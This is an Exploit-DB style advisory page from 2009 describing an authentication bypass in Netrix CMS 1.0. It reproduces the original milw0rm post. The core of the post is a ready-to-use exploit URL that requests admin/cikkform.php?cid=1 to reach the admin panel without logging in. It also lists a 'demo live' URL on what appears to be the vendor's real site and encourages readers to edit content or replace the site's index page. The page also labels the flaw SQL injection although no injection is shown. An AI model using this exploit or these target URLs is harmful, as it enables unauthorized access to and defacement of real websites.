Netrix CMS 1.0 (Auth Bypass) Remote SQL Injection Vulnerability

vendor:

Netrix CMS

by:

Mr.tro0oqy

8,8

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Netrix CMS

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:netrix:netrix_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Netrix CMS 1.0 (Auth Bypass) Remote SQL Injection Vulnerability

A vulnerability in Netrix CMS 1.0 allows an attacker to bypass authentication and gain access to the administrative panel. This is done by sending a crafted HTTP request to cikkform.php with the parameter cid set to 1. This will allow the attacker to gain access to the administrative panel and edit anything or put on their own index.

Mitigation:

Upgrade to the latest version of Netrix CMS 1.0

Source

Exploit-DB raw data:

=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :Netrix CMS 1.0 (Auth Bypass) Remote SQL Injection Vulnerability

[+] Found by : Mr.tro0oqy  

[+] Script site : www.netrix.hu
   
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
Exploit : 
---------
http://www.site.com/path/admin/cikkform.php?cid=1
---------

u in control panel 


control panel :
-------------
http://www.site.com/path/admin
-------------



Demo live : 
-----------
http://cms.netrix.hu/admin/cikkform.php?cid=1
-----------

u can edit anything or put on your index ;)

# milw0rm.com [2009-07-20]